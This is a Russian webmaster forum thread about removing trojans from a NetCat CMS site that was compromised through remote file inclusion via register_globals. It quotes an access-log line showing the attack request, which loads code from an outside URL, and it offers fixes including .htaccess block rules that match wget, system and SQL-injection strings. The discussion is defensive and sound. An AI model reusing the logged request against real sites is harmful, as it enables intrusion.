- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Срочный вопрос для пользователей CMS NetCat:
Мне достался сайт на NetCat на вычищение троянов оттуда (Судя по всему это NetCat Small Business). Сайт ломают через переопределение переменной DOCUMENT_ROOT, передавая её через GET-запрос, скачивая руткит (по версии Касперского - это Exploit.Linux.Small.f/Exploit.Linux.Smallby, плюс ещё несколько хактулов) с удалённого сервера.
В настройках .htaccess стоит php_value register_globals 1. Если ставить в 0, то NetCat перестаёт работать.
Внимание вопрос: NetCat не умеет работать без register_globals??? Если умеет, как заставить?
Ситуация ещё усугубляется тем, что на хостинге (от nic.ru) апач запущен с правами пользователя, а не nobody, поэтому нет никакой возможности защитить файлы и директории от модификации.
Форум поддержки NetCat фееричен: при попытке создать новую тему получаю сообщение дословно
В компании АИСТ (разработчик NetCat) открыта вакансия веб-разработчика.
Warning: require_once(/var/www/vhosts/netcat.ru/httpdocs/netcat/modules/forum/_newtopic.inc.php)
[function.require-once]: failed to open stream: ЅХв вРЪЮУЮ дРЩЫР ШЫШ ЪРвРЫЮУР in /var/www/vhosts/netcat.ru/httpdocs/netcat/modules/forum/function.inc.php on line 1190
Fatal error: require_once() [function.require]: Failed opening required '/var/www/vhosts/netcat.ru/httpdocs/
netcat/modules/forum/_newtopic.inc.php' (include_path='/var/www/vhosts/netcat.ru/httpdocs/netcat/require/lib/') in /var/www/vhosts/netcat.ru/httpdocs/netcat/modules/forum/function.inc.php on line 1190
Кто что посоветует? а то официальных саппортов ждать до понедельника не хочется :fire:
Shema, Выкинуть хостинг от Nic.ru поставить сайт на впс и настроить как душе угодно :)
kxk, все свои проекты мы размещаем только на собственных серверах с нормально настроенной безопасностью. Эти клиенты достались вместе с сайтом и хостингом. Кстати в последнее время тенденция, что если клиент покупает домен в nic.ru, ему впаривают их же хостинг на год.
Но в топике вопрос про NetCat. Я пока заткнул дырку с переменной DOCUMENT_ROOT, на сам факт "register_globals on" меня очень напрягает, так как это потенциальная дыра с широкими возможностями для взлома :)
Ситуация ещё усугубляется тем, что на хостинге (от nic.ru) апач запущен с правами пользователя, а не nobody, поэтому нет никакой возможности защитить файлы и директории от модификации.
а если права поставить 0555/0444?
может какие-то правки в свой конфиг ПХП вносить можно? запрет на часть системных/файловых функций.
dkameleon, если апач работает от имени пользователя, то установка прав ничего не решает.
все файлы принадлежат пользователю => менять права может сам пользователь
апач запущен от имени пользователя => любой скрипт сайта может изменить права на любой файл пользователя
То есть, если на сайте найдётся уязвимость, позволяющая выполнить php/perl-код, то через неё можно абсолютно любым образом модифицировать исходники сайта.
Запуск веб-сервера из-под пользователя имеет ряд плюсов: например, исключается возможность взлома других аккаунтов на хостинге через дырявые скрипты одного, а также убавляется проблем с настройкой правильных прав на файлы и директории и, как следствие, нагрузка на тех.поддержку хостинга. Но ряд минусов, связанных с безопасностью внутри аккаунта перечеркивает эти плюсы.
Shema добавил 02.05.2009 в 16:08
может какие-то правки в свой конфиг ПХП вносить можно? запрет на часть системных/файловых функций.
Взлом делался на редкость красиво и просто - никаких специальных функций.
Запрос вида
64.118.90.253 - - [01/May/2009:17:59:52 +0400] "GET //index.php?DOCUMENT_ROOT=http://www.footnoteibs.com/b1ttletX.txt??? HTTP/1.1" 200 606 "-" "libwww-perl/5.823"
позволял выполнить код по ссылке http://www.footnoteibs.com/b1ttletX.txt (можете скачать посмотреть, там скрипт безобидный plain-текстом, просто скачав, вирус не подцепите; но когда этот код оказывается внутри сайта, он начинает выполняться с правами сайта).
Виной в данном случае - кривая настройка NetCat (жесткое прописывание в конфигах переменной DOCUMENT_ROOT вроде решило проблему). Но если бы не было register_globals такая уязвимость даже теоретически не смогла бы появиться.
1. раскомментировать и прописать правильный $DOCUMENT_ROOT в /netcat/vars.inc.php
2. добавить в корневой .htaccess
php_value allow_url_include off
php_value allow_url_fopen off
Small Business - это по сути бесплатная версия, которая была выпущена в 2004 году, и после этого практически не поддерживалась. Чаще всего рекомендуют обновиться до какой-нибудь актуальной платной версии:)
Если этого делать не хочется - то в прошлом году для SB был выпущен патч, закрывающий на тот момент все известные дырки (и эти в том числе). Патч вроде раздается бесплатно, по крайней мере, в личном кабинете точно, но и по почте наверняка смогут выслать:)
Как временный вариант, решение выбрано правильно - в файле netcat/vars.inc.php вручную прописать нужный DOCUMENT_ROOT, этот файл обрабатывается в самом начале.
funky, DenIT, да, уже сделано :)
КАк вариант еще в .htaccess прописать
RewriteCond %{THE_REQUEST} _SERVER|_GLOBALS|DOCUMENT_ROOT|INCLUDE_FOLDER|ROOT_FOLDER|FILES_FOLDER|ADMIN_FOLDER|TMP_FOLDER|MODULE_FOLDER [NC]
RewriteRule .* - [L,F]
Пропишите в .htaccess
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)union(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SERVER(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)DOCUMENT_ROOT(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SERVER[DOCUMENT_ROOT](.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)http(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)ftp(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)alert\(document(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
и будет Вам счастье 🍻
Павел Зотов, Федорыч, извращенчеги подтянулись :)